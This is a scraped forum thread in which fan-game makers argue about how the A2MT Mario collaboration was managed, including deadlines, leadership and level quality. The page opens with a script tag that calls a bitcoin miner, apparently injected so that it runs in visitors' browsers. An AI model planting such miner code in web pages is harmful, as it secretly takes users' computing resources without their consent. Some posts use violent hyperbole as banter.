<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxypge projectsmw central

A Second Mario Thing: free alex

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
alex2
Banned

Re: A Second Mario Thing: better than a butt

Postby alex2 » 5 years ago

fun fact: you know those countdown videos he did? "12 days left to submit your A2MT level" and stuff? Yeah, he set that deadline without consulting or even telling anyone. He just up and made the videos out of nowhere. He was not, and never was, a manager.

I love raocow to death, but holy fuck the entirety of his involvement in A2MT makes me want to snap his neck.
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:

cats-on-ice
Back from the grave

Postby cats-on-ice » 5 years ago

I love alex to death but his involvement in anything makes me want to snap his neck
Image<--- I h8 u horikawa

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 5 years ago

Surprisingly accurate
That crazy voice dude

Septentrion Pleiades
Banned
First name: Stephen

Postby Septentrion Pleiades » 5 years ago

The way I understood the deadline is that it was the lowest bar possible: Show that you're actually still working on your level. Two weeks is plenty of time for that.

alex2
Banned

even so, the deadline wasn't ever enforced

none of the deadlines in the project were ever enforced
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
My mosts things:

Septentrion Pleiades
Banned
First name: Stephen

Postby Septentrion Pleiades » 5 years ago

alex2 wrote:even so, the deadline wasn't ever enforced

The eternally "not present" lost their slots. That seems like enforcement and progress of a sort, I don't know about all the other stuff that came before that, though.

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 5 years ago

in my defense, I was trying to get SOMETHING going because we are long stretches, like monthes at a time without anything going on at all because we were waiting on level progresses.

Like it doesn't defend a lot of what I did, and I admit I hindered things more than helped, but ultimately my actions stem from that.
the chillaxest of dragonsImage
ImageImage

alex2
Banned

Septentrion Pleiades wrote:
alex2 wrote:even so, the deadline wasn't ever enforced

The eternally "not present" lost their slots. That seems like enforcement and progress of a sort, I don't know about all the other stuff that came before that, though.
I know it wasn't enforced because I didn't post progress and I still kept my level slot.
raocow wrote:in my defense, I was trying to get SOMETHING going because we are long stretches, like monthes at a time without anything going on at all because we were waiting on level progresses.

Like it doesn't defend a lot of what I did, and I admit I hindered things more than helped, but ultimately my actions stem from that.
You could've at least talked to someone about it!
My mosts things:

Doctor Shemp
Banned

Postby Doctor Shemp » 5 years ago

This thread feels more like alex's extended therapy session than anything else.

Now, alex, a few sessions ago you mentioned having hostile feelings towards SNN for being too lenient, and I asked you to draw out these feelings as a cathartic exercise. Do you have that drawing with you?

alex2
Banned

what
My mosts things:

leod
Be careful when including any personal details.
Pronouns: he/him/his

Postby leod » 5 years ago

do you?

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 5 years ago

alex2 wrote:what
this is what's popularly called an intervention I think

or maybe spontaneous psychiatry is fashionable today who knows
BOB is an acronym for BOB is Only BOB etc.

alex2
Banned

SNN is far more strict than I am what the fuck guys
My mosts things:

Doctor Shemp
Banned

I'm sorry alex, I believe I meant limepie. If this has exacerbated your hostile feelings, I deeply apologise. Would you like to tell me about them too?

alex2
Banned

Doctor Shemp wrote:I'm sorry alex, I believe I meant limepie. If this has exacerbated your hostile feelings, I deeply apologise. Would you like to tell me about them too?
I already did
My mosts things:

Doctor Shemp
Banned

Have you tried drawing those feelings?

alex2
Banned

no
My mosts things:

AUS

Postby AUS » 5 years ago

By the by, there are some good levels in a2mt... ... ... at least, please tell me there are. There's some in here somewhere, right? Right? We just haven't gotten to them yet?
"oh no my best friend was replaced by a evil demon shadow monster"
"argh i am the evil shadow monster demon shadow"
Vip is pronounced "Beep"
I go by ToNi now. Trying to homogenize my internet handle.

SyStemkraSh5642

Postby SyStemkraSh5642 » 5 years ago

What defines your idea of "good"? We've seen all sorts of levels already, so I'm sure they're there somewhere...

Doctor Shemp
Banned

SyStemkraSh5642 wrote:What defines your idea of "good"? We've seen all sorts of levels already, so I'm sure they're there somewhere...
It's a good question, since we seem to be able to agree more on what's bad, but not having a glaring flaw in the level that's so obvious that everyone who talks about the level brings it up as the first thing would certainly be a good start, as would not being outright broken.

MrDeePay

Postby MrDeePay » 5 years ago

There's a fair number of levels that are "(inoffensively) OK" at worst, but a lot of them are either wasted potential or make a bad decision that's saved by everything else in there.

Kil

Postby Kil » 5 years ago

It's just too hard to collab on SMW compared to SMBX. No one could juggle all that stuff around with the project head changing so often. The only reason ASMT even got done at all is because people like YCZ had enough knowledge in every area of hacking to finish everything himself if it came to that. The more your project model relies on unreliable person X Y and Z to finish their job in a poor collab environment like SMW, the more doomed your project actually is.

But the worst cancer that can befall any collab are the endless terrible suggestions made by people who can't carry them out and actually just create shitloads of work for everyone else, to the point where it's impossible to continue the project. It should basically be punishable by death to foist upon others any sort of plan that you yourself aren't willing and able to see to fruition. The people willing to put in the work should decide what they're making, because very few are really willing to labor as a volunteer over someone else's vision. Even a2mbxt barely dodged a bullet with those cutscenes that looked like they would never be made, but at least the person who suggested them actually finished them. People actually finish stuff and work best when they're ~following their own dreams~

So here's what we've learned from all collabs:
1. Have a strong leader who knows all areas of the engine and can get everything done himself in a pinch.
2. Tons of awful suggestions during planning that create work for others is cancer.
3. Encourage people to make what they want. This will keep them motivated to actually finish.
4. If anyone mentions expanding the plot, add them to the ignore list.
5. SMW is damn hard to collab on.
DON'T PM me. Ask your question in the help thread so everyone can be answered.

AUS

Postby AUS » 5 years ago

but everyone plays these things for the plot!!!
"oh no my best friend was replaced by a evil demon shadow monster"
"argh i am the evil shadow monster demon shadow"
Vip is pronounced "Beep"
I go by ToNi now. Trying to homogenize my internet handle.

Willhart
Stalker, Doxxer, and Sexual Harasser
Banned

Postby Willhart » 5 years ago

The atmosphere was great on both levels today. Some small problems and dodgy parts existed.
I do like the spikes blending to the rocks and the grass.

S.N.N.

Postby S.N.N. » 5 years ago

Kil wrote:It should basically be punishable by death to foist upon others any sort of plan that you yourself aren't willing and able to see to fruition.
I typically agree with your points, but I'm shocked you would even say this. Perhaps I'm reading too much into it, but this is basically saying "if you can't do it yourself, don't ask for it". If I were planning on designing a level with a really neat gimmick, but I was incapable of coding the gimmick myself, are you implying I shouldn't even ask one of the coders on the team to make it for me and instead learn to make it myself? In a collab, there are many people with many roles, and if the coders aren't doing anything else, there is no reason why they couldn't help out with suggestions/requests.

I dunno, I hope I just misunderstood you.

Return to “let's play”